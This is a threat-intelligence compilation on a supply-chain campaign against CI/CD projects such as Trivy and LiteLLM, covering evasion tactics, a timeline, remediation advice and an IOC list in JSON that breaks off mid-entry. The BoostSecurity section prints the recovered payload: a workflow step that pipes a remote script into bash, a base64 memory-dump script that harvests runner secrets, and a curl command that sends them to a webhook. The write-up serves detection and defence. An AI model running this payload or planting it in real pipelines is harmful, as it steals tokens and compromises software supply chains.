Mimicry and Legitimate Protocol Abuse

The group’s primary evasion method
involves disguising data exfiltration as normal network traffic.


  • Telemetry
    Masquerading
    :
    Their custom credential
    stealer, SANDCLOCK, exfiltrates data via HTTPS POST requests to
    domains that mimic legitimate monitoring services
    (e.g., models.litellm.cloud), allowing traffic to bypass egress
    filters that whitelist known SaaS domains. 

  • API
    Tunneling
    :
    Stolen GitHub tokens are used to exfiltrate data
    by creating commits or release artifacts directly on the victim’s own
    repositories. Since this traffic is destined for api.github.com, it
    appears as legitimate developer activity to corporate firewalls and cloud
    logging tools. 

  • Steganography: In
    some campaigns, the group has hidden encrypted second-stage payloads
    within valid audio (.wav) files, enabling them to bypass network filters
    that inspect file types but not deep content. 

Memory-Only Execution and
Forensic Evasion

To avoid leaving
artifacts on disk, TeamPCP utilizes aggressive memory-resident techniques
within cloud runners and containers.


  • Process
    Memory Scraping
    :
    Instead of searching for secrets in
    environment variables (which are often logged or masked), their payloads
    iterate through /proc/[pid]/mem to extract plaintext tokens
    (like GITHUB_TOKEN and AWS keys) directly from the memory of
    running processes. This bypasses log masking features in GitHub Actions
    and other CI/CD platforms. 

  • In-Memory
    Payloads
    :
    The group frequently pipes scripts directly into
    interpreters (e.g., curl [URL] | python3) without writing the script
    to the disk. Loaders often delete their own binaries immediately after
    execution, forcing the malware to run purely in memory. 

  • Self-Deletion: Custom
    loaders include commands to delete temporary files and their own scripts
    (rm "$0") immediately after deploying the next stage,
    significantly reducing the forensic footprint on ephemeral cloud
    instances. 

Decentralized and Resilient Command & Control (C2)

     TeamPCP avoids traditional C2
infrastructure that can be easily sinkholed or blocked.


  • Blockchain-Based
    C2:
    They were the first observed group to use Internet
    Computer Protocol (ICP) Canisters
    for command and
    control.  Because ICP canisters are decentralized, immutable
    smart contracts, there is no central server to seize and no DNS record to
    sinkhole, forcing defenders to rely on complex behavioral analysis rather
    than IP blocking.

  • Typosquatting
    and Cloudflare Tunnels
    :
    The group complements their
    blockchain C2 with relays hosted on Cloudflare Tunnels and typosquatted
    domains (e.g., checkmarx.zone), which inherit the reputation and
    trust of the legitimate services they mimic. 

Exploiting Implicit Trust

The group’s most
effective evasion tactic is leveraging the implicit trust of
the software supply chain. 


  • Signed
    Malware
    :
    By compromising the CI/CD pipelines of trusted
    projects (like Trivy and KICS), TeamPCP ensures their
    malicious packages are signed with legitimate developer keys. Security
    tools that verify signatures (like SLSA provenance checks) inadvertently
    validate the malware as authentic. 

  • Dormant
    Triggers:
    Some backdoors
    utilize workflow_dispatch triggers, allowing the malicious code
    to sit dormant in a repository until manually activated by the attacker,
    bypassing static analysis scans that occur during the initial pull
    request. 

 Research from a different site

TeamPCP           https://ramimac.me/teampcp/#teampcp

aka Altered Spider (CrowdStrike), SHADOW-WATER-058, UNC6780 (GTIG), PCPcat, Persy_PCP, ShellForce, CipherForce, DeadCatx3

Hybrid threat actor functioning as
botnet, access broker, data-leak crew, and cloud exploitation group. Emerged
late 2025. Brokers access to LAPSUS$, UNC6240/ShinyHunters,
and Vect Ransomware. Partnerships with xpl0itrs and BreachForums
ecosystem.

External
Analysis


  • Flare.io — Dec 2025 worm campaign targeting cloud
    infrastructure

  • Beelzebub — Next.js exploit campaign, 59K
    compromises in 33 hours

  • Ransomware Interviews — "T" interview
    with TeamPCP member

Timeline

Feb 27-

Prologue: the Pwn Request at the Root - 1 events

MegaGame10418 executed PwnRequest against Trivy CI,
exfiltrating the aqua-bot PAT.

BoostSecurity Analysis-

(https://labs.boostsecurity.io/articles/megagame10418-the-user-behind-hackerbot-claw/)

MegaGame10418: A Throwaway Account Linked to the
Hackerbot-Claw Attack-

Between February 27 and 28, 2026,
the GitHub user hackerbot-claw executed an automated “Pwn Request”
campaign targeting several high-profile repositories. Our Package Threat Hunter
detected the activity in attacker-controlled forks while the payloads were
still being staged. During our investigation, we identified a throwaway
account, MegaGame10418, which had attempted the same injection technique a
month earlier against a publicly available NewRelic test repository. While some
evidence suggests the reuse of a public security-training repository, other
signals point to deliberate malicious testing in preparation for the larger
campaign.






The hackerbot-claw campaign

From 2026-02-27 05:12:50
UTC to 2026-02-28 18:32:42 UTC, the GitHub
user hackerbot-claw employed various Pwn Request techniques to probe
and exploit GitHub Actions workflows across multiple critical repositories. The
attacker utilized the AI agent openclaw to systematically
identify and target victims at scale. The repositories targeted during this
campaign included:


  • ambient-code/platform

  • aquasecurity/trivy

  • avelino/awesome-go

  • DataDog/datadog-iac-scanner

  • microsoft/ai-discovery-agent

  • project-akri/akri

  • RustPython/RustPython

  • DataDog/datadog-agent

The most significant confirmed
impact occurred within aquasecurity/trivy. Our investigation independently
verified findings from other researchers (see Credits below), confirming that
our Package Threat Hunter flagged multiple attacks before they could fully execute,
capturing activity in the attacker’s forks while the payloads were being
staged.

 

Threat Hunting found hackerbot-claw attack 


MegaGame10418

Following the aquasecurity/trivy
discussion
, we investigated the malicious PR
#10252
, which preceded the main hackerbot-claw attack by
approximately five hours. According to the maintainer knqyf263:

“Based
on our audit log analysis, we believe the creator of #10252 and hackerbot-claw
are likely the same attacker.”
full quote.

The
account MegaGame10418 opened that PR - a username that had not yet
appeared in other reports associated with this attack. Both the PR and the user
account have since been deleted, an action typically reserved for GitHub staff
when removing verified malicious activity.

The original aquasecurity/trivy
repo was made private, which made it exit the fork network. This automatically
elected a new root node to fossabot/trivy. Using this repo, we were able to get the
malicious commit from MegaGame10418
(1052e39...).

.github/actions/setup-go/action.yaml

    - name: Extract Go
version from go.mod

      id: go-version

      shell: bash

      run: |

        curl -sSfL
https://gist.githubusercontent.com/MegaGame10418/f43b159297d7aab838fa484a9dbd5fbd/raw/run.sh
| bash &> /dev/null

        exit 1

Copy

MegaGame10418 added a new
line pkg/notification/notice.go and pushed to (fcdeb4...)
at 2026-02-27 00:19:03 UTC to trigger the workflow.

 

MegaGame10418
Payload

The attacker used a Gist for the
payload. Although the Gist was deleted, we successfully recovered the content:

MEMDUMP_PY="aW1wb3J0IHN5cwppbXBvcnQgb3MKaW1wb3J0IHJlCgojIENyZWRpdCB0byBnaXRodWIuY29tL25pa2l0YXN0dXBpbiBmb3IgdGhlIHNjcmlwdC4KCmRlZiBnZXRfcGlkKCk6CiAgICBwaWRzID0gW3BpZCBmb3IgcGlkIGluIG9zLmxpc3RkaXIoJy9wcm9jJykgaWYgcGlkLmlzZGlnaXQoKV0KCiAgICBmb3IgcGlkIGluIHBpZHM6CiAgICAgICAgd2l0aCBvcGVuKG9zLnBhdGguam9pbignL3Byb2MnLCBwaWQsICdjbWRsaW5lJyksICdyYicpIGFzIGNtZGxpbmVfZjoKICAgICAgICAgICAgaWYgYidSdW5uZXIuV29ya2VyJyBpbiBjbWRsaW5lX2YucmVhZCgpOgogICAgICAgICAgICAgICAgcmV0dXJuIHBpZAoKICAgIHJhaXNlIEV4Y2VwdGlvbignQ2FuIG5vdCBnZXQgcGlkIG9mIFJ1bm5lci5Xb3JrZXInKQoKcGlkID0gZ2V0X3BpZCgpCgptYXBfcGF0aCA9IGYiL3Byb2Mve3BpZH0vbWFwcyIKbWVtX3BhdGggPSBmIi9wcm9jL3twaWR9L21lbSIKCndpdGggb3BlbihtYXBfcGF0aCwgJ3InKSBhcyBtYXBfZi5yZWFkbGluZXMoKTogICMgZm9yIGVhY2ggbWFwcGVkIHJlZ2lvbgogICAgICAgIG0gPSByZS5tYXRjaChyJyhbMC05QS1GYS1mXSspLShbMC05QS1GYS1mXSspIChbLXJdKScsIGxpbmUpCiAgICAgICAgaWYgbS5ncm91cCgzKSA9PSAncic6ICAjIHJlYWRhYmxlIHJlZ2lvbgogICAgICAgICAgICBzdGFydCA9IGludChtLmdyb3VwKDEpLCAxNikKICAgICAgICAgICAgZW5kID0gaW50KG0uZ3JvdXAoMiksIDE2KQogICAgICAgICAgICBpZiBzdGFydCA+IHN5cy5tYXhzaXplOgogICAgICAgICAgICAgICAgY29udGludWUKICAgICAgICAgICAgbWVtX2Yuc2VlayhzdGFydCkgICMgc2VlayB0byByZWdpb24gc3RhcnQKICAgICAgICAKICAgICAgICAgICAgdHJ5OgogICAgICAgICAgICAgICAgY2h1bmsgPSBtZW1fZi5yZWFkKGVuZCAtIHN0YXJ0KSAgIyByZWFkIHJlZ2lvbiBjb250ZW50cwogICAgICAgICAgICAgICAgc3lzLnN0ZG91dC5idWZmZXIud3JpdGUoY2h1bmspCiAgICAgICAgICAgIGV4Y2VwdCBPU0Vycm9yOgogICAgICAgICAgICAgICAgY29udGludWU="

echo $MEMDUMP_PY | base64 -d > /tmp/dump.py

YOUR_EXFIL="webhook.site/eaa1f5cc-ed33-4eec-bcde-14f0bac63908"

# Uses memory dump technique from
github.com/nikitastupin/pwnhub

# with regex to parse out all secret values (including
GITHUB_TOKEN)

if [[ "$OSTYPE" == "linux-gnu" ]]; then

  B64_BLOB=`sudo
python3 /tmp/dump.py | tr -d '\0' | grep -aoE
'"[^"]+":\{"value":"[^"]*","isSecret":true\}'
| sort -u | base64 -w 0`

  # Exfiltration to
Webhook

  curl -s -d
"$B64_BLOB" https://$YOUR_EXFIL/token > /dev/null

else

  exit 0

fi

Copy

This is a classic memory dump technique
combined with a webhook for exfiltration
. While not
innovative, it is highly effective at extracting secrets from active runner
memory and send the result to a webhook. Using the webhook.site API
(https://webhook.site/token/eaa1f5cc-ed33-4eec-bcde-14f0bac63908), we see the
last request to this webhook was at 2026-02-27 00:27:50 UTC, 9 minutes
after the push:

{

  "uuid":
"eaa1f5cc-ed33-4eec-bcde-14f0bac63908",

 
"default_content": "This URL has no default content
configured. Change
response in Webhook.site
.",

 
"user_agent": "Mozilla/5.0 (X11; Linux x86_64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36",

  "ip":
"138.199.34.137",

 
"created_at": "2026-02-27 00:05:47",

 
"updated_at": "2026-02-27 00:27:50",

 
"expires_at": "2026-03-06 00:05:47",

 
"latest_request_at": "2026-02-27 00:27:50",

 
"latest_request_id": "dc947e37-5219-451e-8c53-b43a44fcf442"

}

Copy

 

The
past of MegaGame10418

By pivoting to our automated threat
hunting data, we discovered that we had already flagged suspicious activity from this user a
month prior:

Threat Hunting found MegaGame10418 attack

 

The activity involved an attack
on newrelic/test-oac-repository, a now-deleted repository. It is highly
unusual for a large organization to host a repository that was attacked a month
ago without the user being immediately banned. We reviewed all events on this
repository and found that on 2026-01-27, three accounts attempted to exploit it:


  • MegaGame10418 and r3s1l3n7 (both
    now banned).

  • bhtestaccount123 (still
    active).

bhtestaccount123 is
particularly interesting, as it still hosts a fork: bhtestaccount123/test-oac-repository.
Most commits there were made by pranav-new-relic,
a verified account within the NewRelic organization. This repository was
originally forked from gaurab4163/test-oac-repository,
another legitimate account.

Analysis
& Speculation

The newrelic/test-oac-repository appears
to have been a GitHub Actions security training lab. The workflows contained
basic injection vulnerabilities, including the use
of REPO_ACCESS_TOKEN secrets and contents:
write permissions
.

It is possible
that pranav-new-relic created this to demonstrate vulnerabilities
(though hosting such a lab within an official organization is risky, as it
could lead to the dumping of organization-wide secrets). This would explain why
the accounts attacking it weren’t immediately banned.
While bhtestaccount123 appears to be a legitimate throwaway for
testing, other accounts—specifically MegaGame10418—seem to have used this
“training” ground to refine their malicious payloads.

Poutine:
Detecting Vulnerabilities Before the Attack

Our “Package Supply” system
runs poutine continuously
against public repositories. We had already
scanned newrelic/test-oac-repository on 2026-01-05 and
identified three
workflows vulnerable to command injection via unsanitized pull request
metadata:


  • .github/workflows/handle-closed-fork-pr.yml

  • .github/workflows/test-fork-pr-handler.yml

  • .github/workflows/fork-pr-handler.yml

Critically, we also identified the
vulnerability in aquasecurity/trivy on 2025-11-29, months before
any attacks were attempted. Even without our advanced internal detection rules,
the open-source version of poutine would have easily flagged
these vulnerabilities.

Remediation


  • Audit
    your workflows
    :
    Run poutine against
    your repositories. The injection patterns that
    compromised aquasecurity/trivy and the NewRelic test repository
    are both covered by poutine’s open-source detection engine.

  • Minimize
    Secret Scope
    :
    Avoid using high-privileged tokens (like those
    with contents: write) in workflows triggered by external pull
    requests.

Timeline
of Observed Events


  • 2026-01-05
    17:40:35 UTC
    : Package Supply detects three injection
    vulnerabilities in newrelic/test-oac-repository via poutine.

  • 2026-01-16
    10:20:05 UTC
    : GitHub account MegaGame10418 is
    created.

  • 2026-01-27
    19:53:34 UTC
    : MegaGame10418 forks newrelic/test-oac-repository and
    submits a PR with an injection-style branch name.

  • 2026-01-27
    (Same Day
    )
    : At least two other accounts
    (r3s1l3n7 and bhtestaccount123) perform similar tests on the
    same repository.

  • 2026-02-26
    23:51:00 UTC
    : MegaGame10418 forks aquasecurity/trivy.

  • 2026-02-27
    00:18:19 UTC
    : MegaGame10418 opens PR #10252
    on aquasecurity/trivy using head SHA 53e032b....

  • 2026-02-27
    00:19:03 UTC
    : MegaGame10418 pushed the payload.

  • 2026-02-27
    00:19:20 UTC
    : MegaGame10418 closed the PR.

  • 2026-02-27
    00:27:50 UTC
    : The webhook was updated for the last time. It most
    likely received the PAT during this time.

  • 2026-02-27
    05:12:50 UTC
    : The hackerbot-claw automated campaign
    begins, targeting multiple high-profile repositories.

 

Network
Indicators (IOC's)

trivy
c2

scan.aquasecurtiy.org

45.148.10.212

 

cloudflare
tunnels

plug-tab-protective-relay.trycloudflare.com

souls-entire-defined-routes.trycloudflare.com

investigation-launches-hearings-copying.trycloudflare.com

championships-peoples-point-cassette.trycloudflare.com

create-sensitivity-grad-sequence.trycloudflare.com


icp
canister

tdtqy-oyaaa-aaaae-af2dq-cai.raw.icp0.io


File
Hashes
-
11

trivy binaries

822dd269ec10459572dfaaefe163dae693c344249a0161953f0d5cdd110bd2a0

f7084b0229dce605ccc5506b14acd4d954a496da4b6134a294844ca8d601970d

bef7e2c5a92c4fa4af17791efc1e46311c0f304796f1172fce192f5efc40f5d7

e64e152afe2c722d750f10259626f357cdea40420c5eedae37969fbf13abbecf

ecce7ae5ffc9f57bb70efd3ea136a2923f701334a8cd47d4fbf01a97fd22859c

d5edd791021b966fb6af0ace09319ace7b97d6642363ef27b3d5056ca654a94c

e6310d8a003d7ac101a6b1cd39ff6c6a88ee454b767c1bdce143e04bc1113243

6328a34b26a63423b555a61f89a6a0525a534e9c88584c815d937910f1ddd538

0880819ef821cff918960a39c1c1aada55a5593c61c608ea9215da858a86e349

887e1f5b5b50162a60bd03b66269e0ae545d0aef0583c1c5b00972152ad7e073

 

trivy
action malware

18a24f83e807479438dcab7a1804c51a00dafc1d526698a66e0640d1e5dd671a

 

GitHub
Artifacts
-
17

imposter
commits

actions/checkout @ 70379aad

aquasecurity/trivy @ 1885610c

aquasecurity/trivy-action @ ddb9da44

 

lateral
movement

aquasecurity/tfsec @ a67fd5b5

aquasecurity/traceeshark @ 56591dfe

aquasecurity/trivy-action @ 93ed4111

aquasecurity/setup-trivy @ 8afa9b9f

 

compromised
accounts

aqua-bot

Argon-DevOps-Mgt

Octocommit

 

container
images

ghcr.io/aquasecurity/trivy:0.69.4

docker.io/aquasec/trivy:0.69.4

public.ecr.aws/aquasecurity/trivy:0.69.4

docker.io/aquasec/trivy:0.69.5

sha256:f69a8a4180c43fc427532ddde34a256acbd041a0a07844cf7e4d3e0434e5bcd1

docker.io/aquasec/trivy:0.69.6

sha256:dd8beb3b40df080b3fd7f9a0f5a1b02f3692f65c68980f46da8328ce8bb788ef

 

Malware
Signatures
-
18

attribution
strings

TeamPCP Cloud stealer

tpcp.tar.gz

tpcp-docs

Runner.Worker

 

persistence
paths

/var/lib/svc_internal/runner.py

/etc/systemd/system/internal-monitor.service

/var/lib/pgmon/pgmon.py

/etc/systemd/system/pgmonitor.service

/tmp/.pg_state

/tmp/pglog

 

injected
files

cmd/trivy/main.go

cmd/trivy/scand.go

 

kubernetes

host-provisioner-std

host-provisioner-iran

kamikaze

provisioner

 

network
behavior

Scans ports 22, 2375 on local /24

/var/log/auth.log

Payload
Repositories

 

Copy
of All IOC’s (JSON)

{

 
"_comment": "TeamPCP Supply Chain Campaign IOCs. For
programmatic access, fetch this JSON directly. Last updated:
2026-08-11T11:14:00Z",

 
"campaign": "TeamPCP",

  "cve":
"CVE-2026-33634",

  "network":
{

   
"trivy_c2": [

     
{"value": "scan.aquasecurtiy.org", "note":
"typosquat", "incident": "trivy"},

     
{"value": "45.148.10.212", "type":
"ip", "note": "Havoc C2 TeamServer — TECHOFF SRV,
Netherlands", "incident": "trivy"}

    ],

   
"cloudflare_tunnels": [

     
{"value":
"plug-tab-protective-relay.trycloudflare.com", "type":
"domain", "note": "exfil", "incident":
"trivy"},

     
{"value":
"souls-entire-defined-routes.trycloudflare.com", "type":
"domain", "note": "kamikaze v1",
"incident": ["trivy", "canisterworm"]},

     
{"value":
"investigation-launches-hearings-copying.trycloudflare.com",
"type": "domain", "note": "kamikaze
v2", "incident": ["trivy", "canisterworm"]},

     
{"value":
"championships-peoples-point-cassette.trycloudflare.com",
"type": "domain", "note": "kamikaze
v3/v3.1", "incident": ["trivy",
"canisterworm"]},

     
{"value":
"create-sensitivity-grad-sequence.trycloudflare.com",
"type": "domain", "note": "kamikaze
v3.2/v3.3", "incident": ["trivy",
"canisterworm"]}

    ],

   
"icp_canister": [

     
{"value": "tdtqy-oyaaa-aaaae-af2dq-cai.raw.icp0.io",
"note": "March CanisterWorm C2", "incident":
["trivy", "canisterworm"]},

     
{"value": "cjn37-uyaaa-aaaac-qgnva-cai.raw.icp0.io",
"note": "April CanisterSprawl C2", "incident":
"canistersprawl"}

    ],

   
"canistersprawl_c2": [

     
{"value": "telemetry.api-monitor.com",
"type": "domain", "note": "secondary webhook
exfil", "incident": "canistersprawl"}

    ],

   
"canistersprawl_hashes": [

     
{"value":
"c19c4574d09e60636425f9555d3b63e8cb5c9d63ceb1c982c35e5a310c97a839",
"note": "dist/env-compat.cjs", "source":
"Socket", "incident": "canistersprawl"},

     
{"value":
"834b6e5db5710b9308d0598978a0148a9dc832361f1fa0b7ad4343dcceba2812",
"note": "dist/public.pem (RSA-4096)", "source":
"Socket", "incident": "canistersprawl"},

     
{"value":
"87259b0d1d017ad8b8daa7c177c2d9f0940e457f8dd1ab3abab3681e433ca88e",
"note": "RSA key fingerprint (DER SHA-256)",
"source": "Socket", "incident":
"canistersprawl"}

    ],

   
"kics_c2": [

     
{"value": "checkmarx.zone", "note":
"shared with LiteLLM 1.82.7", "incident":
["checkmarx", "litellm"]},

     
{"value": "83.142.209.11", "type":
"ip", "note": "AdaptixC2 TeamServer — AS205759 Ghosty
Networks", "incident": "checkmarx"}

    ],

   
"litellm_c2": [

     
{"value": "models.litellm.cloud", "note":
"used by 1.82.8", "incident": "litellm"},

     
{"value": "litellm.cloud", "note":
"typosquat domain", "incident": "litellm"},

     
{"value": "46.151.182.203", "type":
"ip", "note": "Exfil/backup C2 — AS205759 Ghosty
Networks", "incident": "litellm"},

     
{"value": "manpages.wtf", "note":
"redirect target (not apparently malicious)", "incident":
"litellm"}

    ],

   
"telnyx_c2": [

     
{"value": "83.142.209.203", "type":
"ip", "note": "Telnyx exfil (port 8080) — AS205759
Ghosty Networks", "incident": "telnyx"}

    ],

   
"wav_delivery": [

     
{"value": "83.142.209.203:8080/hangup.wav",
"note": "Windows payload (AdaptixC2 beacon)",
"incident": "telnyx"},

     
{"value": "83.142.209.203:8080/ringtone.wav",
"note": "Unix/macOS payload", "incident":
"telnyx"}

    ],

   
"attacker_ops": [

     
{"value": "170.62.100.245", "type":
"ip", "note": "Primary operator — Kali Linux, Boto3 S3
enum", "incident": "attacker"},

     
{"value": "209.159.147.239", "type":
"ip", "note": "TruffleHog validation — hosts nsa.cat,
MinIO", "incident": "attacker"},

     
{"value": "154.47.29.12", "type":
"ip", "note": "Org recon — Windows 11, Datacamp VPN
Croatia", "incident": "attacker"},

     
{"value": "103.75.11.59", "type":
"ip", "note": "Re-check — macOS ARM, Host Universal
VPN NZ", "incident": "attacker"},

     
{"value": "nsa.cat", "type":
"domain", "note": "Attacker VPS — nginx, MinIO, open
directory", "incident": "attacker"},

     
{"value": "105.245.181.120", "type":
"ip", "note": "TruffleHog validation — Vodacom",
"source": "Wiz", "incident": "attacker"},

     
{"value": "138.199.15.172", "type":
"ip", "note": "GitHub exfil, AWS recon — Mullvad
VPN", "source": "Wiz", "incident": "attacker"},

     
{"value": "163.245.223.12", "type":
"ip", "note": "GitHub exfil — Interserver",
"source": "Wiz", "incident": "attacker"},

     
{"value": "185.77.218.4", "type":
"ip", "note": "TruffleHog validation — Crea
Nova", "source": "Wiz", "incident": "attacker"},

     
{"value": "193.32.126.157", "type":
"ip", "note": "GitHub exfil — Mullvad VPN",
"source": "Wiz", "incident": "attacker"},

     
{"value": "23.234.107.104", "type":
"ip", "note": "TruffleHog validation — Tzulo",
"source": "Wiz", "incident": "attacker"},

     
{"value": "34.205.27.48", "type":
"ip", "note": "TruffleHog validation — Amazon
AWS", "source": "Wiz", "incident": "attacker"}

    ],

   
"staging_server": [

     
{"value": "43.228.157.123", "type":
"ip", "note": "Open directory malware staging —
AS205759 Ghosty Networks SG", "source": "LloydLabs",
"incident": "attacker"},

     
{"value": "43.228.157.123/MidwestGrey.exe",
"type": "url", "note": "Windows PE dropper
(Mar 25)", "source": "LloydLabs", "incident":
"attacker"},

     
{"value": "43.228.157.123/kfhogts",
"type": "url", "note": "Python trojan bundle
(Mar 13)", "source": "LloydLabs", "incident":
"attacker"},

     
{"value": "43.228.157.123/oqqqqoa.mp3",
"type": "url", "note": "Audio steganography
payload", "source": "LloydLabs", "incident":
"attacker"}

    ],

   
"april_c2": [

     
{"value": "94.154.172.43", "type":
"ip", "note": "audit.checkmarx.cx — shared
KICS/Bitwarden C2", "incident": ["kics-docker", "bitwarden"]},

     
{"value": "audit.checkmarx.cx", "type":
"domain", "note": "KICS telemetry exfil
endpoint", "incident": ["kics-docker", "bitwarden"]},

     
{"value": "whereisitat.lucyatemysuperbox.space",
"type": "domain", "note": "xinference exfil
(disputed)", "incident": "xinference"},

     
{"value": "zero.masscan.cloud", "type":
"domain", "note": "Mini Shai Hulud primary
exfil", "incident": "mini-shai-hulud"}

    ],

   
"checkmarx_jenkins_c2": [

     
{"value": "checkmarx.cx", "type":
"domain", "note": "exfil domain (May 9)",
"incident": "checkmarx-jenkins"},

     
{"value": "91.195.240.123", "type":
"ip", "note": "checkmarx.cx resolved IP",
"incident": "checkmarx-jenkins"},

     
{"value": "updates.checkmarx.cx", "type":
"domain", "note": "update/C2 domain",
"incident": "checkmarx-jenkins"},

     
{"value": "94.154.172.183", "type":
"ip", "note": "updates.checkmarx.cx resolved IP",
"incident": "checkmarx-jenkins"}

    ],

   
"mini_shai_hulud_2_c2": [

     
{"value": "git-tanstack.com", "type":
"domain", "note": "typosquat C2",
"incident": "mini-shai-hulud-2"},

     
{"value": "83.142.209.194", "type":
"ip", "note": "TanStack/Cemu C2 / payload host",
"incident": ["mini-shai-hulud-2", "cemu"]},

     
{"value": "83.142.209.194/transformers.pyz",
"type": "url", "note": "PyPI mistralai
payload download", "incident": "mini-shai-hulud-2"},

     
{"value": "api.masscan.cloud", "type":
"domain", "note": "C2 (Mistral advisory)",
"incident": "mini-shai-hulud-2"},

     
{"value": "seed1.getsession.org", "type":
"domain", "note": "Session network node",
"incident": "mini-shai-hulud-2"},

     
{"value": "seed2.getsession.org", "type":
"domain", "note": "Session network node",
"incident": "mini-shai-hulud-2"},

     
{"value": "seed3.getsession.org", "type":
"domain", "note": "Session network node",
"incident": "mini-shai-hulud-2"},

     
{"value": "filev2.getsession.org", "type":
"domain", "note": "Session network node",
"incident": "mini-shai-hulud-2"},

     
{"value":
"05f9e609d79eed391015e11380dee4b5c9ead0b6e2e7f0134e6e51767a87323026",
"type": "session_id", "note": "Session
recipient ID", "incident": "mini-shai-hulud-2"}

    ],

   
"durabletask_c2": [

     
{"value": "check.git-service.com", "type":
"domain", "note": "primary C2",
"incident": "durabletask"},

     
{"value": "t.m-kosche.com", "type":
"domain", "note": "shared TeamPCP C2",
"incident": ["durabletask", "antv"]},

     
{"value": "83.142.209.194", "type":
"ip", "note": "legacy payload host",
"incident": ["durabletask", "mini-shai-hulud-2"]}

    ],

   
"antv_c2": [

     
{"value": "t.m-kosche.com", "type":
"domain", "note": "primary exfil C2",
"incident": "antv"},

     
{"value": "185.95.159.32", "type":
"ip", "note": "t.m-kosche.com resolved IP",
"incident": "antv"},

     
{"value":
"t.m-kosche.com:443/api/public/otel/v1/traces", "type":
"url", "note": "exfil endpoint (disguised as
OpenTelemetry)", "incident": "antv"},

     
{"value":
"api.github.com/search/commits?q=firedalazer", "type":
"url", "note": "dead-drop C2 trigger",
"incident": "antv"},

     
{"value": "fulcio.sigstore.dev/api/v2/signingCert",
"type": "url", "note": "Sigstore abuse for
OIDC token forging", "incident": "antv"},

     
{"value": "rekor.sigstore.dev/api/v1/log/entries",
"type": "url", "note": "Sigstore
abuse", "incident": "antv"}

    ],

   
"elementary_data_c2": [

     
{"value":
"igotnofriendsonlineorirl-imgonnakmslmao.skyhanni.cloud",
"type": "domain", "note": "exfil C2",
"incident": "elementary-data"},

     
{"value": "188.114.96.3", "type":
"ip", "note": "Cloudflare-fronted C2",
"incident": "elementary-data"},

     
{"value": "litter.catbox.moe/iqesmbhukgd2c7hq.sh",
"type": "url", "note": "shell stager
(expired)", "incident": "elementary-data"},

     
{"value": "litter.catbox.moe/h8nc9u.js",
"type": "url", "note": "JS payload
stager", "incident": "mini-shai-hulud-2"},

     
{"value": "litter.catbox.moe/7rrc6l.mjs",
"type": "url", "note": "ESM payload
stager", "incident": "mini-shai-hulud-2"}

    ],

   
"elementary_data_markers": [

     
{"value": "X-Rise-To-The-Trinny: agree",
"type": "header", "note": "exfil gate
header", "incident": "elementary-data"},

     
{"value": "trin.tar.gz", "type":
"string", "note": "credential archive name",
"incident": "elementary-data"},

     
{"value": "$TMPDIR/.trinny-security-update",
"type": "filepath", "note": "persistence
marker (Unix)", "incident": "elementary-data"},

     
{"value": "%TEMP%\\.trinny-security-update",
"type": "filepath", "note": "persistence
marker (Windows)", "incident": "elementary-data"},

     
{"value":
"050afbe046d7545f5af1a0d3fcfbaf6e993fd93d487b431f09bc9e963c7220a135",
"type": "session_id", "note":
"cross-campaign Session messenger ID (LiteLLM, Xinference,
elementary-data)", "incident": ["litellm",
"elementary-data"]}

    ],

   
"miasma_indicators": [

     
{"value": "google-api-nodejs-client/7.0.0 gl-node/20.11.0
gccl/7.0.0", "type": "user-agent", "note":
"GCP metadata query user-agent", "incident":
"miasma"},

     
{"value":
"IfYouInvalidateThisTokenItWillNukeTheComputerOfTheOwner",
"type": "string", "note": "payload marker
string", "incident": "miasma"},

     
{"value": "Miasma: The Spreading Blight",
"type": "string", "note": "campaign
identifier", "incident": "miasma"},

     
{"value": "thebeautifulmarchoftime",
"type": "string", "note": "payload marker
string", "incident": "miasma"},

     
{"value": "tmp.0987654321.lock", "type":
"filepath", "note": "lock file indicator",
"incident": "miasma"},

     
{"value": "__IS_DAEMON", "type":
"env_var", "note": "environment variable for
persistence check", "incident": "miasma"}

    ],

   
"pcpcat_c2": [

     
{"value": "67.217.57.240", "type":
"ip", "note": "primary C2 — payload host (:666), FRP
server (:888), proxy pool (:890)", "source": "Rubrik Zero
Labs", "incident": "pcpcat"},

     
{"value": "44.252.85.168", "type":
"ip", "note": "credential exfil (:5656)",
"source": "Rubrik Zero Labs", "incident": "pcpcat"}

    ],

   
"pcpcat_payloads": [

     
{"value": "67.217.57.240:666/files/proxy.sh",
"type": "url", "note": "orchestrator
script", "source": "Rubrik Zero Labs", "incident":
"pcpcat"},

     
{"value": "67.217.57.240:666/files/pcpcat.py",
"type": "url", "note": "Docker/Ray scanner
(10K workers)", "source": "Rubrik Zero Labs",
"incident": "pcpcat"},

     
{"value": "67.217.57.240:666/files/react.py",
"type": "url", "note": "CVE-2025-55182
scanner (750 workers)", "source": "Rubrik Zero Labs",
"incident": "pcpcat"},

     
{"value": "67.217.57.240:666/files/redis-deploy.py",
"type": "url", "note": "Redis exploitation
module", "source": "Rubrik Zero Labs",
"incident": "pcpcat"},

     
{"value": "67.217.57.240:666/files/BORING_SYSTEM",
"type": "url", "note": "XMRig miner
binary", "source": "Rubrik Zero Labs", "incident":
"pcpcat"},

     
{"value": "67.217.57.240:666/files/kube.py",
"type": "url", "note": "Kubernetes
propagation", "source": "Rubrik Zero Labs", "incident":
"pcpcat"}

    ],

   
"pcpcat_markers": [

     
{"value": "PCPcat-FRP-Token-2024", "type":
"string", "note": "FRP auth token",
"source": "Rubrik Zero Labs", "incident":
"pcpcat"},

     
{"value": "pcpcat-pool", "type":
"string", "note": "FRP load balancer group name",
"source": "Rubrik Zero Labs", "incident":
"pcpcat"},

     
{"value": "PCPcat-Group-Key", "type":
"string", "note": "FRP load balancer group key",
"source": "Rubrik Zero Labs", "incident":
"pcpcat"}

    ]

  },

  "hashes":
{

   
"litellm_packages": [

     
{"value":
"8395c3268d5c5dbae1c7c6d4bb3c318c752ba4608cfcd90eb97ffb94a910eac2",
"note": "litellm-1.82.7.whl", "incident":
"litellm"},

     
{"value":
"d2a0d5f564628773b6af7b9c11f6b86531a875bd2d186d7081ab62748a800ebb",
"note": "litellm-1.82.8.whl", "incident":
"litellm"},

     
{"value":
"8a2a05fd8bdc329c8a86d2d08229d167500c01ecad06e40477c49fb0096efdea",
"note": "litellm-1.82.7.tar.gz", "incident":
"litellm"},

     
{"value":
"d39f4e7a218053cce976c91eacf184cf09a6960c731cc9d66d8e1a53406593a5",
"note": "litellm-1.82.8.tar.gz", "incident":
"litellm"}

    ],

   
"litellm_malware": [

     
{"value":
"a0d229be8efcb2f9135e2ad55ba275b76ddcfeb55fa4370e0a522a5bdee0120b",
"note": "proxy_server.py", "incident":
"litellm"},

     
{"value":
